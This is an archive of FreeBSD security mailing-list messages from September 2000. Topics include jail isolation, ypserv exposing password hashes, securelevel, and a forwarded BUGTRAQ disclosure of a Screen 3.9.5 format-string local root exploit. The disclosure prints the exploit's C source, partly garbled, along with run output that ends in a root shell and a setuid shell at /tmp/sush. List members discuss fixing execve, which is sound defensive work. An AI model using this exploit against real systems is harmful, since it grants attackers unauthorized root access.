From owner-freebsd-security Sun Sep 10 23: 6:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A90A237B424 for ; Sun, 10 Sep 2000 23:06:16 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA53692; Mon, 11 Sep 2000 00:06:13 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA71230; Mon, 11 Sep 2000 00:05:46 -0600 (MDT) Message-Id: <200009110605.AAA71230@harmony.village.org> To: "David Andreas Alderud" Subject: Re: Set user stack area type? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 08 Sep 2000 23:16:14 +0200." <001601c019da$05dc9140$6400a8c0@XGod> References: <001601c019da$05dc9140$6400a8c0@XGod> Date: Mon, 11 Sep 2000 00:05:46 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <001601c019da$05dc9140$6400a8c0@XGod> "David Andreas Alderud" writes: : Is there a way to change the type of the user stack area (i.e. : executable/non-executable)? No. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 10 23:10: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5989437B423 for ; Sun, 10 Sep 2000 23:10:03 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA53705; Mon, 11 Sep 2000 00:09:58 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA71257; Mon, 11 Sep 2000 00:09:36 -0600 (MDT) Message-Id: <200009110609.AAA71257@harmony.village.org> To: "Matthew D. Fuller" Subject: Re: Home Directories -- in the point of security? Cc: Brett Glass , "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 08 Sep 2000 17:39:18 CDT." <20000908173918.D9652@futuresouth.com> References: <20000908173918.D9652@futuresouth.com> <4.3.2.7.2.20000908161720.04680100@localhost> <4.3.2.7.2.20000908162832.04cff4c0@localhost> Date: Mon, 11 Sep 2000 00:09:36 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000908173918.D9652@futuresouth.com> "Matthew D. Fuller" writes: : Let friends alone :P : Friends are easy. Friends are friendly. Friends know you know where : they live. Friends know you're insane and if they putz up your box, they : know to already have the flight out of the country scheduled. Friends generally know that you know how to execute rm -rf ~friend if the are too stupid to live and the number of beers it takes to get you to not hit return. Generic web hosting clients, on the other hand, are dumber than dirt, on the average, and need to have as many walls built around them as possible. Consider using jail(8) and giving each one their own IP address and ARIN be damned. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 13:42:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 4FED237B423 for ; Mon, 11 Sep 2000 13:42:28 -0700 (PDT) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id WAA15748; Mon, 11 Sep 2000 22:42:56 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 13YaPF-0003uc-00 for ; Mon, 11 Sep 2000 22:42:21 +0200 Date: Mon, 11 Sep 2000 22:42:21 +0200 From: Szilveszter Adam To: freebsd-security@freebsd.org Subject: [paul@STARZETZ.DE: Breaking screen on BSD] Message-ID: <20000911224221.A14920@petra.hos.u-szeged.hu> Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! I am sure most people have read this on BUGTRAQ today... Our take? Regards: -- Szilveszter ADAM Szeged University Szeged Hungary ----- Forwarded message from Paul Starzetz ----- X-Mailer: Mozilla 4.7 [en] (Win98; U) Date: Sat, 9 Sep 2000 19:19:29 +0200 From: Paul Starzetz Subject: Breaking screen on BSD To: BUGTRAQ@SECURITYFOCUS.COM Hi @ll, In contrast to my previous posting I found a way to exploit format string vulnerable applications, which are suid root (like screen) on BSD-like systems. The mentioned problems arise form the low virtual memory address (VMA) we want write to. As far as there is no way to construct a string containing more 0x0's in standard C, we can profit from a feature (bug?) in the passing of environment variables by execve function. execve() will pass empty env strings (pointers to zeros, _not_ NULL pointers) AS IS, so passing e.g. environ[a] = empty, environ[a] = empty will lead to two 0x0#s pushed somewhere onto the stack... With this feature we can construct an array of arbitrary data on the bottom of the called programm's stack. If this array can be reached from a fmt-vulnerable function, we can write to ANY VMA address including also the .data section of a BSD process. So we could now utilize that and write a new exploit for screen which is our example here, but there is still another problem. Screen would lock up after we simply write to (&real_uid - 2) because we write to a part of another variable too, in this case struct display* display, which leads to a complete crash. A look at the debugger output shows that the following variable may be overwritten without consequences, it seems to be less important flag variable (sample offsets): 00055888 display 0005588c real_uid 00055890 adaptflag 00055894 rflag Depending on the version you may not be able to overwrite real_uid wihtout crash.... So the technique we need is to construct the 0x0 at &real_uid by increasing the write address successively by 1, writting to lsb first. This leads to following exploit: a.out USAGE a.out bash-2.04$ id uid=1000(kurak) gid=10(users) groups=10(users) First we need a bufferoffset at which screen wouldn't crash after at _only_ one padding = {0,1,2,3}. The pair 10 0 would do the job here: bash-2.04$ a.out 0 10 0 0 Screen 3.9.5 local r00t exploit by IhaQueR@IRCNET creating magic string building /tmp/.home/.screenrc creating /tmp/.home/.bashrc compiling suid shell press enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid Screen version 3.09.05 (FAU) 1-Sep-99 ... chown: /tmp/sush: Operation not permitted chmod: /tmp/sush: Operation not permitted kurak@ExploitMe> STATUS shows: 7m5e-309-2e+1530-2e+1531e-30934-2e+1535e-3092e-3232e-3097e-309-2e+153-2e+1534e-309 chown: /tmp/sush: Operation not permitted chmod: /tmp/sush: Operation not permitted I have no name!@ExploitMe>id uid=318941 gid=10(users) groups=10(users) ... [screen is terminating] Now the uid is 318941, hex 0x0004dddd, which means we have the write sequence 2, 3, 0, 1. So the padding must be increased by 8 again: bash-2.04$ a.out 0 10 0 8 ... I have no name!@ExploitMe>id uid=3705461980 gid=10(users) groups=10(users) ... [screen is terminating] Now uid is 3705461980, hex 0xdcdcdcdc, so now we need to increase the byteadj by 256-0xdc = 36: bash-2.04$ a.out 0 10 36 8 ... uid=0(root) gid=10(users) groups=10(users) root@ExploitMe>ls -l /tmp total 70 -r--r--r-- 1 root wheel 11 Sep 7 13:07 .X0-lock drwxrwxrwt 2 root wheel 512 Sep 7 13:07 .X11-unix drwxr-xr-x 2 kurak wheel 512 Sep 9 19:52 .home drwxr-xr-x 3 root wheel 512 Sep 7 13:51 screens -rw-r--r-- 1 kurak wheel 3970 Sep 9 03:55 stackdmp -rwsr-xr-x 1 root wheel 25564 Sep 9 20:16 sush ... Boah, now we have uid=0 and a suid shell at /tmp/sush :-) Note, with this technique you may bypass even an non-exec stack, because we aren't executing anything. With the 'byte by byte' writing technique combined with the execve 'feature' one may write to even low VMA any data he want (assuming the application is vulnerable of course). Imagine a suid app, which never starts a shell nor uses setuid(), but calls e.g. /bin/mail to report you are trying to abuse it... You may change the string "/bin/mail" for example to "/tmp/r00t".... regards. FILE: explbsd395.c tested again OpenBSD 2.8-beta (broken :-) ------------------------------------------------------------------------------------------------- /**************************************************************** * * * Screen 3.9.5 BSD local exploit * * by IhaQueR at IRCNET * * !only for demonstrative purposes! * * * ****************************************************************/ #include #include #include #include #include #include #include #include #include #include extern char **environ; char* home = "/tmp/.home"; char* ev1 = "PS1=\\u@ExploitMe>"; #define SCREEN "/usr/local/bin/screen-3.9.5" #define SHELL "/bin/sh" #define SCREENRC ".screenrc" #define BASHRC ".bashrc" /* offset to the env seen from Msg() */ #define BUFOFFSET 2682 /* addr to be written (may vary)*/ #define WRITEADDR 0x3c1e4 /* some addresses grabbed from 3.9.5 OpenBSD: &real_uid, &real_gid, &eff_uid, &eff_gid 0x3c1e4 0x3c224 0x3b1b0 0x3b1a4 for finding addresses see expl.c, it may be hard... */ /* repeat the addr table in environ */ #define ENVREP 32 /* but write only once */ #define WREP 1 char* env[ENVREP*4 + 256]; #define TMPBUFSIZE (BUFOFFSET+1024) int main(int argc, char** argv) { int i, off=0; int writeoffs=0, bufoffset=0, padding=0, bfoff=0, byteadj=0; int ep=0, b=0, ob=0; unsigned vv[ENVREP+2]; unsigned char* pp; FILE* fp; char buf[TMPBUFSIZE]; unsigned char myhome[TMPBUFSIZE]; char screenrc[TMPBUFSIZE]; char bashrc[TMPBUFSIZE]; char pad[TMPBUFSIZE]; char buf2[TMPBUFSIZE]; if(argc != 5) { printf("USAGE %s \n", argv[0]); return 0; } else { printf("Screen 3.9.5 local r00t exploit\n"); printf("by IhaQueR@IRCNET\n\n"); } /* user supplied offsets */ writeoffs = atoi(argv[1]); bfoff = atoi(argv[2]); byteadj = atoi(argv[3]); padding = atoi(argv[4]); /* create env */ for(i=0; i%s 'chown root /tmp/sush; chmod 4755 /tmp/sush'", bashrc); system(buf); /* create suid shell */ printf("compiling suid shell\n"); snprintf(buf, TMPBUFSIZE, "echo >/tmp/sush.c 'main(int ac, char** av){setuid(0); setgid(0); execv(\"%s\", av);}'", SHELL); system(buf); system("gcc /tmp/sush.c -o /tmp/sush"); /* set env and call screen */ argv[1] = NULL; printf("press enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid"); getchar(); execve(SCREEN, argv, env); } ------------------------------------------------------------------------------------------------- ----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 14:11:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 052CC37B422 for ; Mon, 11 Sep 2000 14:11:21 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e8BLB8E40365; Tue, 12 Sep 2000 01:11:08 +0400 (MSD) (envelope-from ache) Date: Tue, 12 Sep 2000 01:11:06 +0400 From: "Andrey A. Chernov" To: Szilveszter Adam Cc: freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] Message-ID: <20000912011105.A40182@nagual.pp.ru> References: <20000911224221.A14920@petra.hos.u-szeged.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20000911224221.A14920@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Mon, Sep 11, 2000 at 10:42:21PM +0200 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > As far as there is no way to construct a string containing more 0x0's in > standard C, we can profit from a feature (bug?) in the passing of > environment variables by execve function. execve() will pass empty env > strings (pointers to zeros, _not_ NULL pointers) AS IS, so passing e.g. > environ[a] = empty, environ[a] = empty will lead to two 0x0#s pushed > somewhere onto the stack... With this feature we can construct an array > of arbitrary data on the bottom of the called programm's stack. If this > array can be reached from a fmt-vulnerable function, we can write to ANY > VMA address including also the .data section of a BSD process. Obviously this bug is too general and not related to screen only. It seems we need to fix execve() to prevent this. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 14:23:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 872F637B42C for ; Mon, 11 Sep 2000 14:23:21 -0700 (PDT) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id XAA17819; Mon, 11 Sep 2000 23:23:53 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 13Yb2s-00045o-00 for ; Mon, 11 Sep 2000 23:23:18 +0200 Date: Mon, 11 Sep 2000 23:23:18 +0200 From: Szilveszter Adam To: freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] Message-ID: <20000911232318.A15053@petra.hos.u-szeged.hu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20000911224221.A14920@petra.hos.u-szeged.hu> <20000912011105.A40182@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0.1i In-Reply-To: <20000912011105.A40182@nagual.pp.ru>; from ache@nagual.pp.ru on Tue, Sep 12, 2000 at 01:11:06AM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Sep 12, 2000 at 01:11:06AM +0400, Andrey A. Chernov wrote: > Obviously this bug is too general and not related to screen only. > It seems we need to fix execve() to prevent this. Certainly it is. Screen was just an example, although the $SUBJECT line might have caused some people to overlook this as 'not important' -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 17:57: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BEEA837B423; Mon, 11 Sep 2000 17:57:07 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id RAA93766; Mon, 11 Sep 2000 17:57:07 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 11 Sep 2000 17:57:07 -0700 (PDT) From: Kris Kennaway To: Szilveszter Adam Cc: freebsd-security@freebsd.org Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] In-Reply-To: <20000911224221.A14920@petra.hos.u-szeged.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 11 Sep 2000, Szilveszter Adam wrote: > Hi! > > I am sure most people have read this on BUGTRAQ today... > > Our take? I thought it was a technique for exploiting the known (and fixed) vulnerability in the previous version of the screen port, not a new attack in itself. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 19:14: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 9225737B422; Mon, 11 Sep 2000 19:13:59 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e8C2Dwd42717; Tue, 12 Sep 2000 06:13:58 +0400 (MSD) (envelope-from ache) Date: Tue, 12 Sep 2000 06:13:57 +0400 From: "Andrey A. Chernov" To: Kris Kennaway Cc: Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] Message-ID: <20000912061357.A42654@nagual.pp.ru> References: <20000911224221.A14920@petra.hos.u-szeged.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.ORG on Mon, Sep 11, 2000 at 05:57:07PM -0700 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 11, 2000 at 05:57:07PM -0700, Kris Kennaway wrote: > I thought it was a technique for exploiting the known (and fixed) > vulnerability in the previous version of the screen port, not a new attack > in itself. No, it is a new exploit based on execve behaviour and not related especially to screen, other programs can be affected too. We definitely need to fix execve. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 19:28:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 696A737B422 for ; Mon, 11 Sep 2000 19:28:55 -0700 (PDT) Received: (qmail 85350 invoked by uid 1000); 12 Sep 2000 02:28:56 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 Sep 2000 02:28:56 -0000 Date: Mon, 11 Sep 2000 21:28:56 -0500 (CDT) From: Mike Silbersack To: "Andrey A. Chernov" Cc: Kris Kennaway , Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] In-Reply-To: <20000912061357.A42654@nagual.pp.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 12 Sep 2000, Andrey A. Chernov wrote: > On Mon, Sep 11, 2000 at 05:57:07PM -0700, Kris Kennaway wrote: > > I thought it was a technique for exploiting the known (and fixed) > > vulnerability in the previous version of the screen port, not a new attack > > in itself. > > No, it is a new exploit based on execve behaviour and not related > especially to screen, other programs can be affected too. We definitely > need to fix execve. If it's new, why does it rely on corrupting VBELL as the previous screen exploit did? Can this execve behavior be exploiting in a program which wasn't broken by a buffer overflow or a format string bug? Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 19:53:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 2943037B42C; Mon, 11 Sep 2000 19:53:20 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e8C2rE943198; Tue, 12 Sep 2000 06:53:14 +0400 (MSD) (envelope-from ache) Date: Tue, 12 Sep 2000 06:53:14 +0400 From: "Andrey A. Chernov" To: Mike Silbersack Cc: Kris Kennaway , Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] Message-ID: <20000912065314.A43158@nagual.pp.ru> References: <20000912061357.A42654@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from silby@silby.com on Mon, Sep 11, 2000 at 09:28:56PM -0500 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 11, 2000 at 09:28:56PM -0500, Mike Silbersack wrote: > > No, it is a new exploit based on execve behaviour and not related > > especially to screen, other programs can be affected too. We definitely > > need to fix execve. > > If it's new, why does it rely on corrupting VBELL as the previous screen > exploit did? Can this execve behavior be exploiting in a program which > wasn't broken by a buffer overflow or a format string bug? Screen 3.9.8 is not vulnerable to this. By "new" I mean part of it related to execve behaviour which is generally dangerous, not whole exploit at once. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 20:11:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 8553637B423 for ; Mon, 11 Sep 2000 20:11:29 -0700 (PDT) Received: (qmail 85462 invoked by uid 1000); 12 Sep 2000 03:11:26 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 Sep 2000 03:11:26 -0000 Date: Mon, 11 Sep 2000 22:11:26 -0500 (CDT) From: Mike Silbersack To: "Andrey A. Chernov" Cc: Kris Kennaway , Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] In-Reply-To: <20000912065314.A43158@nagual.pp.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 12 Sep 2000, Andrey A. Chernov wrote: > Screen 3.9.8 is not vulnerable to this. By "new" I mean part of it related > to execve behaviour which is generally dangerous, not whole exploit at > once. Ah, I misunderstood you. Thanks for the clarification. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 20:32:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from theshell.com (arsenic.theshell.com [63.236.138.5]) by hub.freebsd.org (Postfix) with SMTP id B53E337B42C for ; Mon, 11 Sep 2000 20:32:17 -0700 (PDT) Received: (qmail 32689 invoked from network); 12 Sep 2000 03:32:17 -0000 Received: from arsenic.theshell.com (HELO tequila) (root@63.236.138.5) by arsenic.theshell.com with SMTP; 12 Sep 2000 03:32:17 -0000 From: "Peter Avalos" To: Subject: ypserv giving out encrypted passwords Date: Mon, 11 Sep 2000 22:35:09 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm running ypserv as a slave and ypbind on a 4.1-S machine. Snip from ypserv(8) manpage: To make up for this, the FreeBSD version of ypserv handles the master.passwd.byname and master.passwd.byuid maps in a special way. When the server receives a request to access either of these two maps, it will check the TCP port from which the request originated and return an error if the port number is greater than 1023. Since only the superuser is al- lowed to bind to TCP ports with values less than 1024, the server can use this test to determine whether or not the access request came from a privileged user. Any requests made by non-privileged users are therefore rejected. This sounds like a wonderful thing, but why only tcp? I don't want people to ypcat master.passwd and get all the encrypted passwords on my system. I verified that a ypmatch uses udp on a port >1023 witch tcpdump: ypmatch pavalos master.passwd pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: udp 88 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: udp 108 stun-port 1994/udp #cisco serial tunnel port So my question is: Is this a configuration error, or a 'feature' (bug)? Thanks, Peter Avalos TheShell.com -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M- V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++ ------END GEEK CODE BLOCK------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 11 23:10: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id EEFD837B422 for ; Mon, 11 Sep 2000 23:10:03 -0700 (PDT) Received: from bagabeedaboo.security.at12.de (dial-213-168-73-82.netcologne.de [213.168.73.82]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id IAA02782 for ; Tue, 12 Sep 2000 08:10:02 +0200 (MET DST) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by bagabeedaboo.security.at12.de (8.11.0/8.11.0) with ESMTP id e8C69uS00502 for ; Tue, 12 Sep 2000 08:09:56 +0200 (CEST) (envelope-from pherman@frenchfries.net) Date: Tue, 12 Sep 2000 08:09:56 +0200 (CEST) From: Paul Herman To: freebsd-security@FreeBSD.ORG Subject: init securelevel 1 -> 0, dangerous? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Does anyone know of any dangers of letting init lower the securelevel to zero for single user mode? What I already know is that allowing gdb to attach (via ptrace(2)) to init (to trick it into lowering securelevel) is forbiden in kern/sys_process.c (or kern/kern_prot.c in -CURRENT) I asked -hackers and -current a week ago, but got no concrete answers, so I thought I'd ask one last time on -security. There is an open PR on this... Ideas? -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 7: 1:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 6198B37B422 for ; Tue, 12 Sep 2000 07:01:33 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA21101; Tue, 12 Sep 2000 07:00:57 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21099; Tue Sep 12 07:00:42 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA31796; Tue, 12 Sep 2000 07:00:42 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdK31773; Tue Sep 12 06:59:51 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8CDxoI69308; Tue, 12 Sep 2000 06:59:50 -0700 (PDT) Message-Id: <200009121359.e8CDxoI69308@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdv69302; Tue Sep 12 06:59:24 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: "Peter Avalos" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ypserv giving out encrypted passwords In-reply-to: Your message of "Mon, 11 Sep 2000 22:35:09 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 12 Sep 2000 06:59:23 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Peter Avalos" writes: > I'm running ypserv as a slave and ypbind on a 4.1-S machine. > > Snip from ypserv(8) manpage: > > To make up for this, the FreeBSD version of ypserv handles the > master.passwd.byname and master.passwd.byuid maps in a special way. > When > the server receives a request to access either of these two maps, it > will > check the TCP port from which the request originated and return an > error > if the port number is greater than 1023. Since only the superuser is > al- > lowed to bind to TCP ports with values less than 1024, the server can > use > this test to determine whether or not the access request came from a > privileged user. Any requests made by non-privileged users are > therefore > rejected. > > This sounds like a wonderful thing, but why only tcp? I don't want people to > ypcat master.passwd and get all the encrypted passwords on my system. I > verified that a ypmatch uses udp on a port >1023 witch tcpdump: > > ypmatch pavalos master.passwd > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash > 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: > udp 88 > 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: > udp 108 > > stun-port 1994/udp #cisco serial tunnel port > > So my question is: Is this a configuration error, or a 'feature' (bug)? I was unable to recreate your problem here at home (the only place I do use YP). Tcpdump showed that appropriate ports were used when root or non-root made issued the request. Are you sure you weren't root or that ypmatch wasn't setuid root on the client system? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 7:28:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from theshell.com (arsenic.theshell.com [63.236.138.5]) by hub.freebsd.org (Postfix) with SMTP id A15B637B424 for ; Tue, 12 Sep 2000 07:28:32 -0700 (PDT) Received: (qmail 24152 invoked by uid 501); 12 Sep 2000 14:28:36 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 Sep 2000 14:28:36 -0000 Date: Tue, 12 Sep 2000 07:28:36 -0700 (PDT) From: Peter Avalos To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: ypserv giving out encrypted passwords In-Reply-To: <200009121359.e8CDxoI69308@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > In message , "Peter > Avalos" > 